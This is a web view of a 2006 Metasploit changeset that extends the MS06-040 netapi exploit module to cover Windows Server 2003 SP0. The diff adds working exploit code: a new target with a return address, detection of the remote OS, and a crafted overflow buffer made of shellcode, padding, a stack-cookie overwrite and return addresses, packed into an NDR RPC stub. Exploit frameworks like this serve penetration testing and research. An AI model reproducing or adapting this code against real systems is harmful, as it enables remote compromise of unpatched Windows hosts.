Navigation

← Previous Changeset
Next Changeset →

Changeset 4023

Timestamp:

10/15/06 02:54:58 (2 years ago)

Author:

hdm

Message:

Windows 2003 method from Trirat

Files:

framework2/trunk/exploits/netapi_ms06_040.pm (modified) (5 diffs)

Legend:

: Unmodified
: Added
: Removed
: Modified
: Copied
: Moved

framework2/trunk/exploits/netapi_ms06_040.pm

r4006	r4023
27	27	[
28	28	'H D Moore <hdm [at] metasploit.com>',
	29	'Trirat Puttaraksa <trir00t [at] gmail.com>',
29	30	],
30	31
…	…
66	67	will likely result in a complete reboot on Windows 2000 and the termination of all
67	68	SMB-related services on Windows XP. The default target for this exploit should succeed
68		on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1.
	69	on Windows NT 4.0, Windows 2000 SP0-SP4+, and Windows XP SP0-SP1. The exploit also
	70	work on Windows Server 2003 SP0. However, the service will crash sometime after
	71	the exploitation.
	72
69	73	}
70	74	),
…	…
80	84	'Targets' =>
81	85	[
82		[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)' ],
	86	[ '(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1, 2003 SP0)' ],
83	87	[ '(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4', 1000, 0x00020804 ],
84	88	[ '(wcscpy) Windows XP SP0/SP1', 612, 0x00020804 ],
85	89	[ '(stack) Windows XP SP1 English', 656, 680, 0x71ab1d54], # jmp esp @ ws2_32.dll
86	90	[ '(stack) Windows XP SP1 Italian', 656, 680, 0x71a37bfb], # jmp esp @ ws2_32.dll (thanks diaul!)
	91	[ '(wcscpy) Windows Server 2003 SP0', 612, 0x71c8c1ec],
87	92	],
88	93
…	…
161	166	}
162	167	elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+)$/ ) {
	168	$target = $self->Targets->[5];
163	169	$self->PrintLine("[*] Detected a Windows 2003 (Build $1 - No Service Pack) target");
164		~~$self->PrintLine("[*] This system is not yet supported.");~~
165		~~return;~~
166	170	}
167	171	elsif ( $smb->PeerNativeOS =~ m/Windows Server 2003 (\d+) Service Pack (\d+)/ ) {
…	…
272	276	Pex::NDR::Long(int(rand(250)+1)).
273	277	Pex::NDR::Long(0);
274		} else {
	278
	279	#
	280	# Use wcscpy() method with cookie overwrite on Windows Server 2003 SP0
	281	#
	282	} elsif ($target->[0] =~ /2003/) {
	283
	284	my $path =
	285
	286	$shellcode .
	287	# padding
	288	Pex::Text::AlphaNumText($target->[1] - length($shellcode)).
	289	Pex::Text::AlphaNumText(32).
	290	# cookie
	291	substr($shellcode, 0, 4).
	292	Pex::Text::AlphaNumText(4).
	293	# return address
	294	pack('V', $target->[2]).
	295	Pex::Text::AlphaNumText(8).
	296	pack('V', $target->[2]).
	297	pack('V', $target->[2]).
	298	Pex::Text::AlphaNumText(36).
	299	# terminate
	300	"\x00\x00";
	301
	302	# Packet that into a stub
	303	$stub =
	304	Pex::NDR::Long(int(rand(0xffffffff))).
	305	Pex::NDR::UnicodeConformantVaryingString('').
	306	Pex::NDR::UnicodeConformantVaryingStringPreBuilt($path).
	307	Pex::NDR::Long(int(rand(250)+1)).
	308	Pex::NDR::UnicodeConformantVaryingString('').
	309	Pex::NDR::Long(int(rand(250)+1)).
	310	Pex::NDR::Long(0);
	311
	312	}else {
275	313	$self->PrintLine("This target is not currently supported");
276	314	return;

Navigation

Changeset 4023

Legend:

framework2/trunk/exploits/netapi_ms06_040.pm

Download in other formats: